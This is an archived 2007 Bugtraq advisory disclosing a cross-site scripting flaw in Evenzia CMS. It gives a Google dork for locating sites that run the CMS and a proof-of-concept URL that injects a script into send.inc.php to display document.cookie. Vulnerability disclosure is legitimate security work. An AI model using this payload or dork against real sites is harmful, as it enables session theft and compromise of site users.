|
Bugtraq
mailing list archives
Evenzia CMS XSS
From: glafkos () infosec org uk
Date: 1 Jun 2007 16:58:16 -0000
Application: Evenzia CMS
Vendors Url: http://www.evenzia.com
Bug Type: Cross-Site Script
Exploitation: Remote
Introduction: Evenzia CMS is a web-based CMS system
Google Dork: "Powered By eVenzia CMS" || "Developed By eVenzia"
PoC:
http://www.test.com/includes/send.inc.php/>'>><script>alert(document.cookie)</script>
Credits:
Glafkos Charalambous
glafkos (at) infosec (dot) org (dot) uk
Information Security Uncensored
InfoSEC.org.uk
June 1st, 2007
By Date
By Thread
Current thread:
- Evenzia CMS XSS glafkos (Jun 01)
|